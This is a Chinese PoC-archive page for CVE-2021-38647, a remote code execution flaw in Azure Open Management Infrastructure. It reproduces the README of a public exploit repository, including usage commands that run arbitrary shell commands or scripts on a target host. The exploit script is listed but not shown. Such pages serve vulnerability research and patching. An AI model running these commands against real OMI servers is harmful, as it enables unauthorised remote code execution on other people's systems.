关联漏洞
标题:
Microsoft Azure 授权问题漏洞
(CVE-2021-38647)
描述:Microsoft Azure是美国微软(Microsoft)公司的一套开放的企业级云计算平台。 Microsoft Azure Open Management Infrastructure存在授权问题漏洞。以下产品和版本受到影响:Azure Open Management Infrastructure <omi-1.6.8-1。
描述
A PoC exploit for CVE-2021-38647 RCE in OMI
介绍
# cve-2021-38647
A PoC exploit for CVE-2021-38647 RCE in OMI.
Execute a single command using `ExecuteShellCommand` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 shell id
```
Execute a single command using `ExecuteShellCommand` on the default HTTP port:
```
python cve-2021-38647.py 10.10.10.10 -p 5985 shell id
```
Execute a single command using `ExecuteScript` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 script -c id
```
Execute a script using `ExecuteScript` on the default HTTPS port:
```
python cve-2021-38647.py -s 10.10.10.10 script -f script.sh
```
文件快照
[4.0K] /data/pocs/f9c82fffcf715f13d262918b773f5be96b212ddf
├── [7.5K] cve-2021-38647.py
├── [1.0K] LICENSE
└── [ 613] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。